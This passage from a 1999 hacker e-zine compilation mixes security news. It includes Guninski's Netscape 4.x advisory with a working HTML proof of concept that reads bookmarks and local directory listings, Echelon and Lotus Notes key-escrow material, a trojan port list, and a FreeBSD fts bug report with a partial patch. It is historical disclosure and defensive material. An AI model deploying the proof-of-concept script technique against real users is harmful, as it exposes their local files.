Then when the bookmarks file is open, the JavaScript code is executed in
the security
context of a local file - the bookmarks file.
The bookmarks file may be open by a script, probably a server redirect
or by the user.
The bookmarks file name must be known, but it is easily guessed for most
dialup
users.
Vulnerabilities: reading user's bookmarks, browsing local directories,
reading local files (works fine on Linux, probably possible on Windows).
Workaround: Disable JavaScript or do not bookmark untrusted pages.
Demonstration is available at: http://www.nat.bg/~joro/book2.html
See attached file for the source.
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
--------------------------------------------------------------------------
<http://www.nat.bg/~joro/book2.html>
<HTML><HEAD>
<TITLE>
<SCRIPT>
alert('Bookmarks got control');
s='Here are some bookmarks: \n';
for(i=1;i<7;i++)
s += document.links[i]+'\n';
alert(s);
dirToRead='wysiwyg://2/file://c:/';
a=window.open(dirToRead);
s='Here are some files in C:\\ :\n';
for(i=1;i<7;i++)
s += a.document.links[i]+'\n';
a.close();
alert(s);
</SCRIPT>
</TITLE></HEAD>
<BODY>
There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks
with Javascript code in the title.
<br>If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE>
tag and bookmark that page, the JavaScript code is written in the local bookmarks file.
Then when the bookmarks file is open, the JavaScript
code is executed in the security context of a local file. The bookmarks
file may be open by a script, probably a server redirect or by the user.
The bookmarks file name must be known - easily guessed for most dialup
users.
<p>Vulnerability: reading user's bookmarks, browsing local directories,
reading local files (works fine on Linux, probably possible on Windows).
<br>
Workaround: Disable JavaScript or do not bookmark untrusted pages.
<br>
<hr WIDTH="100%">
<br>To test it:
<br>1) Bookmark this page.
<br>2) Close all NC windows and restart NC.
<br>3) Open bookmarks file (change the filename in the field below if needed
and click "Open bookmarks", or use File| Open Page... )
<br>
<hr WIDTH="100%">
<FORM>
Enter the file name of your bookmarks file:
<INPUT TYPE=TEXT SIZE=70 VALUE='c:\Program Files\Netscape\Users\default\bookmark.htm'>
</FORM>
<SCRIPT>
function openBookmarks() {
/* bmFile='c:\\Program Files\\Netscape\\Users\\default\\bookmark.htm'; */
a=window.open('wysiwyg://1/file:///'+document.forms[0].elements[0].value);
}
</SCRIPT>
<A HREF="javascript:openBookmarks()">Open bookmarks</A>
</BODY>
<hr WIDTH="100%">
<A HREF="http://www.nat.bg/~joro">Go to Georgi Guninski's home page</A>
</HTML>
@HWA
17.0 Lotus Notes in bed with the NSA on encryption keys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml)
http://www.wired.com/news/print_version/politics/story/19602.html?wnpg=all
Spying on the Spies
by Niall McKay
12:15 p.m. 10.May.99.PDT
The National Security Agency has its ear to the world, but doesn't listen to everyone at once.
That was one conclusion of a new report, Interception Capabilities 2000, accepted late last week by the European Parliament's Science and Technology Options Assessment Panel (STOA).
The panel commissioned Duncan Campbell, a British investigative reporter, to prepare a report on Echelon, the US-led satellite surveillance network.
"I have no objection to these systems monitoring serious criminals and terrorists," said Glyn Ford, a British Labour Party member of parliament and a committee member of STOA. "But what is missing
here is accountability, clear guidelines as to who they can listen to, and in what circumstances these laws apply."
Campbell was asked to investigate the system in the wake of charges made last year in the European Parliament that Echelon was being used to funnel European government and industry secrets into US
hands.
"What is new and important about this report is that it contains the first ever documentary evidence of the Echelon system," said Campbell. Campbell obtained the document from a source at Menwith
Hill, the principal NSA communications monitoring station, located near Harrogate in northern England.
The report details how intelligence agencies intercept Internet traffic and digital communications, and includes screen shots of traffic analysis from NSA computer systems.
Interception Capabilities 2000 also provides an account of a previously unknown, secret international organization led by the FBI. According to Campbell, the "secret" organization, called ILETS
(International Law Enforcement Telecommunications Seminar), is working on building backdoor wiretap capabilities into all forms of modern communications, including satellite communications
systems.
"[The report] is undoubtedly the most comprehensive look at Echelon to date because of its attention to detail -- [and] the NSA's use of technology," said John Young, a privacy activist in New York.
Although the United States has never officially acknowledged Echelon's existence, dozens of investigative reports over the past decade have revealed a maze-like system that can intercept telephone,
data, cellular, fax, and email transmissions sent anywhere in the world.
Previously, Echelon computers were thought to be able to scan millions of telephone lines and faxes for keywords such as "bomb" and "terrorist." But Campbell's report maintains that the technologies
to perform such a global dragnet do not exist.
Instead, Campbell said that the system targets the communications networks of known diplomats, criminals, and industrialists of interest to the intelligence community.
The report charges that popular software programs such as Lotus Notes and Web browsers include a "back door," through which the NSA can gain access to an individual's personal information.
Citing a November 1997 story in the Swedish newspaper, Svenska Dagbladet, the report said that "Lotus built in an NSA 'help information' trapdoor to its Notes system, as the Swedish government
discovered to its embarrassment."
The report goes on to describe a feature called a "workfactor reduction field" that is built into Notes and incorporated into all email sent by non-US users of the system. The feature reportedly
broadcasts 24 of the 64 bits of the key used for each communication, and relies on a public key that can only be read by the NSA.
Lotus could not be reached for comment.
The new report emerges as politicians on both sides of the Atlantic are growing increasingly concerned about Echelon and its capabilities.
"I believe that it's time that there is some congressional scrutiny of the Echelon project and I am examining a way to do that," said Representative Bob Barr (R-Georgia). "I understand the need for
secrecy -- I was with the CIA myself -- but Echelon has raised some questions about fundamental policy and constitutional rights."
Barr is concerned that the NSA is using its Echelon partners to help it sidestep laws that forbid the US government from spying on its own people.
So far, there has been very little scrutiny of spy systems in the United States, according to Patrick Poole, a privacy advocate and lecturer in government and economics at Bannock Burn College in
Franklin, Tennessee.
"The only significant examination of spy systems in the United States was the Church Report, which was prompted by Watergate in the early '70s," said Poole. "I hope that Europe's interest in the
Echelon system will spark some new debate in the US."
Echelon is believed to be principally operated by the NSA and its British counterpart, the Government Communications Headquarters. The system also reportedly relies on agreements with similar
agencies in other countries, including Canada's Communications Security Establishment, Australia's Defense Signals Directorate, and New Zealand's Government Communications Security Bureau.
(From Packet Storm Security http://www.genocide2600.com/~tattooman/new.shtml)
Hello,
1st off please don't publish my name on your site. I'm too lazy to
set up another cheezy mail acct.
Today I downloaded cryptography/nsa/lotus.notes.backdoor.txt from
your site. I have a close friend who is a developer for Iris (the
people who make Notes for lotus.) I sent him the file I downloaded and
asked him what the deal was, and here's his response:
Here's the necessary info to truly understand the issue here; a speech by Ray
Ozzie and Charlie Kaufman's white paper on the topic. What it comes down to is
that notes provides superior exportable encryption technology when compared to
other US products on the market. For anyone (but the NSA) to crack our
international encryption keys they must crack a 64 bit key, the same as with a
US encryption key. In the international version we take 24 of the 64 bit
encryption key and encrypt the 24 bits with the NSA's public key and send it,
encrypted strongly, along with the encrypted message. This means the NSA can
decrypt with their key and have 24 of the 64 bit key. They still have to break
the remaining 40 bits. 40 bit key encryption has been the max for exportable
encryption and that is what all other US exportable encryption providers
allow.
That limit has just been raised to 56 bits and we are incorporating that as I
type. In the worst case: the NSA's private key is compromised, the 40 bit
portion of the key still must be cracked. So we haven't weakened the security
of international encryption, but actually made it equal to the US security (to
everyone but the NSA). We are proud of this arrangement because we have found
a way to make Notes as secure as the US government will allow for our
international customers. If we hadn't used this technique all of the
international notes encrypted data would be with only a 40 bit key. As it
stands, the 64 bit key used in both US and international encryption is
extremely secure.
It's too bad the author of this article choose to attack Lotus Notes without
considering the options the US government provides. We could have just
shipped 40 bit encryption like MS, Netscape, etc. and leave our international
customers with weak encryption but we didn't. Oh well, you can't make everyone
understand, this confusing and frustrating stuff. I hope this helps.
-<deleted his name>
*** Prepared Remarks of Ray Ozzie,
*** President of Iris Associates
*** an affiliate of Lotus Development Corporation
*** Delivered at opening of the RSA Data Security Conference '96
***
<keynote>
SAN FRANCISCO, Jan. 17, 1996 -- As we're all painfully aware, the U.S.
government continues to maintain that cryptography should be
classified and controlled as a munition of war -- and for good
historical reason: Some of cryptography's finest hours have been
during past wars.
From the government's standpoint, the export controls implied by
munitions classification must be working very well, since there has
been no mass-deployed worldwide cryptography, most general
communications is still in cleartext, and no world of unbreakable
crypto has emerged.
In the meantime, while we're preoccupied by protecting the flow of
bits across borders, trouble is brewing. Criminals don't recognize
borders but operate in one wild-and-wolley network. Crackers are able
to attack targets halfway around the world with no fear of
prosecution. Exceptionally smart people in Eastern Europe crack
financial systems in New York.
Everywhere you look, bright, clever people are breaking into
communication systems, industrial control systems, transportation
systems, health care systems -- anything and everything that's
controlled by networked computers. And as you know, this isn't a
theoretical problem, or just a problem with clever people stealing
money from banks; it's a "clear and present danger" that's a direct
result of our having moved into the information age without adequately
securing our information and our global information systems.
This is not just an issue of signals Intelligence or of Title III
wiretaps or of lost software industry profits; this is a public safety
issue.
One of these days, someone is going to bring down an airliner
somewhere in the world, or cause a train wreck, or destabilize an
economy, by breaking into an information system through the worldwide
net. And it may be something that we could have prevented, if we had
been making more casual and widespread use of cryptography.
And that's why I, and a number of you, spend so much time trying to
change the system -- trying to educate, to help convince the U.S.
Government to liberalize export controls, to allow our customers
worldwide to have access to good security, to protect themselves
against the threats present on the worldwide networks.
To be sure, the customers are getting more and more astute. Due in
large part to the press surrounding the cracking of a few 40-bit RC4
keys last year, our customers have lost confidence in 40-bit crypto.
They told us that, if we were going to continue to market 40-bit Lotus
Notes overseas, we should stop marketing it as a secure system -- that
we should start to call it "data scrambling" or "data masking" instead
of encryption. And so we have continued to lobby, arguing that the
benefits of substantially better exportable crypto outweigh the risks.
The government's response? Well, their latest proposal might -- in
theory -- allow us to ship a 64-bit product overseas so long as it had
third-party key escrow features built in. We talked to our customers
about the administration's proposal, and the answer was very clear:
our customers have said a resounding "no" to key escrow in Lotus
Notes.
They simply don't like the notion that they can't compute the
additional risk and liability introduced by a third party holding the
keys to unlock their data. Well, that left us in a bind.
We need to provide better security for our international customers,
but the government's proposal was clearly unacceptable to them.
And because I didn't see a "silver bullet" solution -- or general
export relief -- in the cards, I began looking for an interim solution
that might allow us to ship a more secure product in the short term,
while we continued to argue for substantial revision of national
cryptography policy.
And after months of negotiation, I'm here to announce that we have
found a short-term workaround to the problem, which I hope you will
find to be an interesting, new development in the area of cryptography
as it pertains to export controls.
While this is a very tough issue, and while I personally believe that
a world of widespread cryptography is truly inevitable, the name of
the game right now is to find a compromise solution that satisfies the
stated needs of the U.S. Government, while still providing good
information security.
This is just such a compromise.
Lotus Notes Release 4, which is now shipping, utilizes a new method of
security that we're referring to as "Differential Workfactor
Cryptography." It is a conceptually simple solution that addresses two
problems at the same time: First, it protects sensitive corporate
information from most malicious crackers far more effectively than
previously exported products; second, it permits the government to
retain its current level of access to encrypted information carried by
U.S. products overseas.
No more access, no less access.
As you know, the U.S. government has defined its "maximum tolerance
level" for exportable unescrowed cryptography at 40 bits. That is,
because they generally permit the export of 40-bit products, the U.S.
government is clearly already willing to deal with a 40-bit work
factor in order to examine encrypted communications outside of this
country.
So, the system that we're shipping in Lotus Notes Release 4 overseas
is one that presents different work factors to different parties,
hence the name.
Against crackers -- against the run-of-the-mill adversary trying to
break a message -- the work factor is 64 bits, just like it is in the
U.S. That is, in the new International Edition of Lotus Notes, bulk
data keys are now 64 bits just as they are in our North American
Edition that's sold in the U.S. and Canada.
But when the U.S. Government needs access to a communications stream
overseas encoded by the international edition of Lotus Notes, they are
no worse off - and no better off - than they are today - they have to
crack 40 bits.
So how can this be true, when the work factor is 64 bits for
non-governmental adversaries? It's pretty simple. We asked the
government to generate a special RSA key pair, and to make known their
RSA Public Key. We asked them to keep their private key classified,
compartmentalized -- as secret as they'd keep the keys to their own
military and diplomatic communication systems -- and to never disclose
it to anyone.
Then, we changed Notes so that whenever the product generates an
encrypted 64-bit bulk data key, bound to that key is a small package
-- a "workfactor reduction field" -- containing 24 bits of the bulk
data key encrypted with the U.S. government's public key. So the U.S.
government has exclusive access to 24 of the 64 bits.
That's 64 bits against the cracker, 40 bits for the government.
And, of course, this version of Notes is fully interoperable with the
North American Edition of Notes, the only version that we sell in the
United States.
In the North American Edition, as always, keys generated for
communications within the U.S. and Canada aren't subject to any kind
of work factor reduction. And both the North American Edition and the
International Edtion are shipping today.
We are very pleased that we are now able to offer this increased level
of security to our overseas customers. And I encourage you out there
-- product designers and developers who are in a similar bind -- to
offer stronger confidentiality features to your customers in your
exported products by taking advantage of our already having negotiated
export approval for this Differential Workfactor implementation.
But please make no mistake about it: We fully recognize that this is a
compromise solution. This is not a panacea. This is not the "silver
bullet" that addresses all needs.
We continue to argue vigorously that global and national economic
security, domestic law enforcement related to Information security
crimes, and personal privacy concerns would all be served well by the
rapid and broad, worldwide proliferation of good, strong, high-grade
cryptography. And we continue to push for a complete and public review
of national cryptography policy.
But we relish the fact that, in today's highly-charged political
climate surrounding the issue of cryptography, we were able to
negotiate a solution that increases information security for our
worldwide customers. By throwing another potential solution into the
mix -- by leading the way for others by clearing its export approval
-- we hope that this stirs debate related to national cryptography
policy.
A debate that is both global and local in nature; a debate that, with
your help, we can hopefully bring to the attention of the U.S Public.
Updated: 01/17/96 01:14:15 PM
</keynote>
***
*** White Paper by Charlie Kaufman, distributed at the RSA '96
conference
***
<whitepaper>
Differential Workfactor Cryptography
Charlie Kaufman
Security Architect
Iris Associates
January 17, 1996
Abstract: This document describes the technical approach behind the
exportable strong cryptography included in Lotus Notes Release 4
(International Edition). Current U.S. export regulations generally prohibit
the export of cryptographic software that uses keys larger than 40 bits,
but advances in processor technology make 40 bit keys breakable by
exhaustive search practical for a growing collection of potential
attackers. In a novel scheme we sometimes refer to as 64/40, we provide
the cryptographic strength of 64 bit keys against most attackers while to
comply with export regulations we make the workfactor for breaking the
system equivalent to only 40 bits for the U.S. government. We do that
by encrypting 24 of the 64 bits under a public RSA key provided by the
U.S. government and binding the encrypted partial key to the encrypted data.
Background: As we're all painfully aware, the U.S. government continues
to maintain that cryptography should be classified and controlled as a
munition of war. There is a long historical basis for this - some of
cryptography's finest hours have been during the wars of the past. And
while some would argue that export controls are a sham because many
foreign governments impose no such restrictions and we participate in an
international marketplace, by one very important measure export controls
have been a success: no mass-deployed worldwide cryptography has emerged
and most general communications is still in cleartext.
But while the government has been successfully defending its ability to
spy, trouble has been brewing. Criminals don't recognise borders -
there's
only one wild and wooly network. Crackers are able to attack targets
halfway around the world with no fear of prosecution. Smart people in
Eastern Europe crack financial systems in New York. Everywhere you
look, bright clever people are breaking into communication systems,
industrial control systems, transportation systems, health care systems,
anything and everything that's controlled by networked computers. This is
not a theoretical problem, or just a problem with clever people stealing
money from banks; it's a clear and present danger that's a direct result of
the fact that we've moved into the information age without adequately
securing our global information systems.
Lotus Notes has been a pioneer in providing transparent strong RSA based
cryptography in its product offering. It went to great lengths to provide
the strongest protection legally permissable. There is an International
Edition that complies with export regulations and a domestic edition that
does not (called the North American Edition because it is legally available
in the U.S. and Canada). In the International Edition, users use two RSA
key pairs - one used to protect data integrity and authentication and
another (shorter) one to protect data confidentiality because only data
confidentiality key sizes are regulated by export controls. Full
interoperability between the North American and International Editions is
achieved by having the two ends negotiate down to the largest key size that
both ends support. This design came at no small cost, but it was the only
way we could deliver the best security possible to each of our customers
given the existing regulatory climate.
Differential Workfactor Cryptography is another innovation in the direction
of giving our customers the best security we can while continuing to oppose
the regulations that make the complexity necessary.
How it works: The idea behind Differential Workfactor Cryptography is
simple; whenever a bulk data key is created, a 64 bit random number is
chosen. If the use of that key is one involving data confidentiality and
the International Edition of Notes, 24 of the bits are encrypted under a
public RSA key that was provided to us by the U.S. government and the
result - called a Workfactor Reduction Field - is bound into the encrypted
data. There is no Workfactor Reduction Field in data used only by the
domestic edition of Notes, and there is none for keys that are not used
for data confidentiality (e.g. those used for authentication).
If an attacker wanted to break into a Notes system based on information
obtained by eavesdropping, he would have to exhaustively search a 64 bit
key space. Even the U.S. government would face this workfactor because
there is no Workfactor Reduction Field in keys used for authentication.
An attacker who wanted to read an encrypted document that was either read
from a server or eavesdropped from the wire would face a 64 bit workfactor.
But if the U.S. government needed to decrypt such a document it could
obtain 24 of the bits using its private key and the Workfactor Reduction Field
and then exhaustively search a 40 bit key space.
Tamper resistance: You might wonder what's to prevent someone from deleting
the Workfactor Reduction Field from a document or the setup protocol of a
network connection. This is similar to the problem faced in the Clipper
design to assure that the LEAF field was not removed from a conversation.
In a software only implementation, it is not possible to prevent tampering
entirely. The easiest form of tampering would be to smuggle the North
American Edition CD out of the U.S. or pass it to someone over the
Internet. The best a software implementation can do in terms of tamper
resistance is to make it impossible to remove the Workfactor Reduction
Field without modifying both the source of the data and the destination..
This can be done by having the destination check for the presence of the
Workfactor Reduction Field and refuse to decrypt the data if it is not
there or not correct. The destination can't decrypt the Workfactor
Reduction Field to check it, but knowing the bulk data key and the
government public key, it can regenerate the WRF and compare the result
with the supplied value. RSA has the convenient property that the same
value encrypted twice produces the same result; it would be somewhat more
complex (but still possible) to duplicate this functionality with other
public key algorithms. [Note: for this to work, the random pad that was
used in creating the WRF must be delivered to the recipient of the message.
For it to be secure, it must be delivered encrypted since a clever attacker
who knew the pad could do 2^24 trial encryptions to get 24 bits of the key
and then do 2^40 trial decryptions to recover the rest.]
Frequently Asked Questions:
Q: Does this mean that the International Edition of Lotus Notes Release 4
is just as secure as the North American Edition against someone who does
not know the U.S. Government's key.
A: Almost. There are factors other than the 64 and 40 bit secret keys.
The International Edition is still limited to 512 bit RSA keys when they
are used for data confidentiality. The North American Edition uses 630 bit
RSA keys in this context. While 512 bit RSA keys are considerably more
secure than 40 bit secret keys, they are not as secure as 64 bit keys, so in
both cases it would be more cost effective to attack the RSA keys than to
attack the secret keys. In considering the security of the International
Edition, users must also assess the likelihood that an attacker might learn the
government's private key either by breaking through the government's
protective mechanisms or by breaking the single RSA key. If either were
to happen, the International Edition would become only as secure as other
40 bit products.
Q: Does Lotus also have a copy of the private key used to reduce the
workfactor from 64 to 40 bits?
A: No. The U.S. government generated the RSA key and supplied us with
the public component. We never had access to the private component (which
made debugging this thing a real joy!).
Q: How is this scheme different from Key Escrow?
A: While one goal may be the same - to provide exportable strong
cryptography - there are differences with respect to security,
functionality, and administrative convenience. It is more secure than
Key Escrow in that even if third parties misbehave, there remains a
substantial workfactor in breaking each individual message. It may be
more or less secure than Key Escrow depending on the policies of the
holder of the U.S. government key compared to the policies of possible
Key Escrow agents. It is less functional than some Key Escrow proposals
because it is impractical to use this facility to recover lost keys. And
it is more administratively convenient than key escrow because there is no
communication with third parties necessary as part of setup. Notes is
secure 'out of the box'.
Q: Does this scheme address law enforcement concerns within the U.S.
(i..e. should it be considered an alternative to Clipper)?
A: No. In only one way does this scheme address the Law Enforcement
interests of either U.S. or foreign governments: better information
security helps Law Enforcement to guard against information-related crimes.
As indicated by our continuing to go to considerable expense to maintain
both domestic and international editions, we continue to oppose any
limits on domestic use of strong cryptography.
</whitepaper>
@HWA
18.0 Packetstom Security Gets the choke order for .yu sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
execorder.txt - Last week, I received a copy of an "Executive Order" from The White House,
signed by President Clinton, along with several emails informing me that it is now illegal
for me to "provide any software or technology to Yugoslavia and Montenegro". In other words,
I was told that I need to restrict access to this web site so that anybody from the .yu TLD
could not access and download "exploits" and "hacker tools". It was suggested that I deny
access to anybody using proxies, anonymizers, non-resolvable IP addresses, and of course
anybody from Yugoslavia. This is absurd. Here is my "Executive Reply" to President Clinton:
Fuck you and your stupid orders, Bill.
THE WHITE HOUSE
Office of the Press Secretary
________________________________________________________________________
For Immediate Release May 1, 1999
EXECUTIVE ORDER
- - - - - - -
BLOCKING PROPERTY OF THE GOVERNMENTS
OF THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO),
THE REPUBLIC OF SERBIA, AND THE REPUBLIC OF MONTENEGRO,
AND PROHIBITING TRADE TRANSACTIONS INVOLVING
THE FEDERAL REPUBLIC OF YUGOSLAVIA (SERBIA AND MONTENEGRO)
IN RESPONSE TO THE SITUATION IN KOSOVO
By the authority vested in me as President by the Constitution and
the laws of the United States of America, including the International
Emergency Economic Powers Act (IEEPA) (50 U.S.C. 1701 et seq.), the
National Emergencies Act (50 U.S.C. 1601 et seq.), and section 301 of
title 3, United States Code,
I, WILLIAM J. CLINTON, President of the United States of America, in
order to take additional steps with respect to the continuing human
rights and humanitarian crisis in Kosovo and the national emergency
described and declared in Executive Order 13088 of June 9, 1998, hereby
order:
Section 1. Amendment to Executive Order 13088. (a) Section 1(a) of
Executive Order 13088 of June 9, 1998, is revised to read as follows:
"Section 1. (a) Except to the extent provided in section 203(b)
of IEEPA (50 U.S.C. 1702(b)), and in regulations, orders,
directives, or licenses that may hereafter be issued pursuant to
this order, all property and interests in property of the
Governments of the Federal Republic of Yugoslavia (Serbia and
Montenegro), the Republic of Serbia, and the Republic of Montenegro
that are in the United States, that hereafter come within the
United States, or that are or hereafter come within the possession
or control of United States persons, including their overseas
branches, are hereby blocked."
(b) Section 2 of Executive Order 13088 is hereby revoked, and a new
section 2 is added to read as follows:
"Sec. 2. Except to the extent provided in section 203(b) of
IEEPA (50 U.S.C. 1702(b)) and in regulations, orders, directives,
or licenses that may hereafter be issued pursuant to this order,
and notwithstanding any contract entered into or any license or
permit granted prior to the effective date of this order, the
following are prohibited:
"(a) the exportation, reexportation, sale, or supply, directly
or indirectly, from the United States, or by a United States
person, wherever located, to the Federal Republic of Yugoslavia
(Serbia and Montenegro) or the Government of the Federal Republic
of Yugoslavia (Serbia and Montenegro), the Government of the
Republic of Serbia, or the Government of the Republic of
Montenegro, of any goods (including petroleum and petroleum
products), software, technology (including technical data), or
services;
"(b) the importation into the United States, directly or
indirectly, of any goods, software, technology (including technical
data), or services from the Federal Republic of Yugoslavia (Serbia
and Montenegro) or owned or controlled by the Government of the
Federal Republic of Yugoslavia (Serbia and Montenegro), the
Government of the Republic of Serbia, or the Government of the
Republic of Montenegro; and
"(c) any transaction or dealing by a United States person,
wherever located, in goods, software, technology (including
technical data), or services, regardless of country of origin, for
exportation, reexportation, sale, or supply to, or exportation from
or by, the Federal Republic of Yugoslavia (Serbia and Montenegro)
or the Government of the Federal Republic of Yugoslavia (Serbia and
Montenegro), the Government of the Republic of Serbia, or the
Government of the Republic of Montenegro. This prohibition
includes, without limitation, purchase, sale, transport, swap, or
brokerage transactions in such items, and approving, financing,
insuring, facilitating, or guaranteeing any such transactions."
(c) Section 4 of Executive Order 13088 is revised to read as follows:
"Sec. 4. Any transaction by a United States person that evades
or avoids, or has the purpose of evading or avoiding, or attempts
to violate, any of the prohibitions set forth in this order is
prohibited. Any conspiracy formed to violate the prohibitions of
this order is prohibited."
(d) Section 7 of Executive Order 13088 is revised to read as follows:
"Sec. 7. (a) The Secretary of the Treasury, in consultation with
the Secretary of State, shall give special consideration to the
circumstances of the Government of the Republic of Montenegro and
persons located in and organized under the laws of the Republic of
Montenegro in the implementation of this order.
"(b) The Secretary of the Treasury, in consultation with the
Secretary of State, shall give special consideration to the
humanitarian needs of refugees from Kosovo and other civilians
within the Federal Republic of Yugoslavia (Serbia and Montenegro)
in the implementation of this order.
"(c) The Secretary of the Treasury, in consultation with the
Secretary of State, is hereby directed to authorize commercial
sales of agricultural commodities and products, medicine, and
medical equipment for civilian end use in the territory of the
Federal Republic of Yugoslavia (Serbia and Montenegro) under
appropriate safeguards to prevent diversion to military,
paramilitary, or political use by the Government of the Federal
Republic of Yugoslavia (Serbia and Montenegro), the Government of
the Republic of Serbia, or the Government of the Republic of
Montenegro."
Sec. 2. Preservation of Authorities. Nothing in this order is
intended to affect the continued effectiveness of any rules,
regulations, orders, licenses, or other forms of administrative action
issued, taken, or continued in effect heretofore or hereafter under the
authority of IEEPA, except as hereafter terminated, modified, or
suspended by the issuing Federal agency.
Sec. 3. No rights or privileges conferred. Nothing contained in
this order shall confer any substantive or procedural right or privilege
on any person or organization, enforceable against the United States,
its agencies or its officers.
Sec. 4. (a) Effective date. This order is effective at 12:01 a.m.
eastern daylight time on May 1, 1999.
(b) Transmittal; Publication. This order shall be transmitted to the
Congress and published in the Federal Register.
WILLIAM J. CLINTON
THE WHITE HOUSE,
April 30, 1999.
# # #
@HWA
19.0 Common Trojans and the ports they can be found on
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
After seeing several questions about traffic directed at ports as 31337 and
12345 I've put together a list of all trojans known to me and the default
ports they are using. Of course several of them could use any port, but I
hope this list will maybe give you a clue of what might be going on.
port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
Stealth, Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack´99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil
You'll find the list on the following address:
http://www.simovits.com/nyheter9902.html (still in Swedish but it will be
translated in the near future).
To help anyone to detect trojan attacks, I´m planning to add information
about the original names of the executables, their size, where they usually
are hiding, and the names of any helpfiles they may use. I will also add
tools or links to tools that may be of your assistance.
Feel free to get back to me with any comments or suggestions. If you find
new trojans I´ll love to get my hands on them, but please mail me first, as
I don´t need more than one copy. If you have live experiance of trojan
attacks I´m interested to read about your findings.
Joakim
joakim.von.braun@risab.se
@HWA
20.0 Fts_read vulnerabilty provides root compromise in FreeBSD find, du
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 14:32:42 +0400
From: Stas Kisel <stas@SONET.CRIMEA.UA>
To: BUGTRAQ@netspace.org
Subject: fts, du, find
Hi.
I use FreeBSD-2.2.8 and FreeBSD-2.2.7 and I know that these versions are
no longer supported, but:
1. There are many people still using 2.2
2. This bug probably applies to FreeBSD-3.1 and ever to OpenBSD and other.
Approximately a month ago I've found a very strange behaviour of 'du'
with long direstory structures. I left this alone due to lack of time,
but some days ago I saw an article on bugtraq concerning similar
behaviour of 'find'.
There is a one bug in libc causing this behaviour. I have a patch, but
I did not tested it much ;)
Both 'find' and 'du' use 'fts' (fts_read,...) functions to traverse
directory structure.
fts uses realloc() to reallocate memory in quite complex lists.
There is a bug in adjusting pointers after realloc().
So when dealing with large directory structures (when realloc() needed),
some pointers can point to free()-ed memory.
I have no exploit and probably will no have a free time (I think
3 days is more than enough) for doing it, but I beleive it is
possible to exploit this bug using carefully designed directory
tree to execute arbitrary commands as root during
/etc/daily->/etc/security->find.
REMOTE ROOT EXPLOIT (POSSIBLE).
At least it is possible to hide setuid binary this way in home dir or in /tmp.
The following patch is designed for FreeBSD-2.2.8-RELEASE libc.
There was the following ID in the beginning of the source file.
/* $OpenBSD: fts.c,v 1.9 1997/08/02 00:13:49 millert Exp $ */
I've only tested this patch on one machine during one day, so
it is probably buggy.
If you'll apply this patch, please drop me a line if there was any side effect
and I'll do a followup in the bugtraq, say, on the Friday.
------------------ patch ----------------------------------------
--- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999
+++ /usr/src/lib/libc/gen/fts.c Wed May 12 13:16:08 1999
@@ -740,8 +740,26 @@
* If had to realloc the path, adjust the addresses for the rest
* of the tree.
*/
- if (adjaddr)
+ if (adjaddr){
fts_padjust(sp, adjaddr);
+ /* Adjust the list, because we want to return it robust. */
+/* fix p->fts_path and p->fts_accpath
+ p->fts_accpath can be:
+ either cur->fts_path (adjust, because cur is already adjusted)
+ either p->fts_path (adjust)
+ either p->fts_name (do not adjust)
+ I'm also almost sure that in first case cur->fts_path=p->fts_path...
+*/
+#define ADJUST1(p) if((p)->fts_path != adjaddr){ \
+ if((p)->fts_accpath != (p)->fts_name){ \
+ (p)->fts_accpath = \
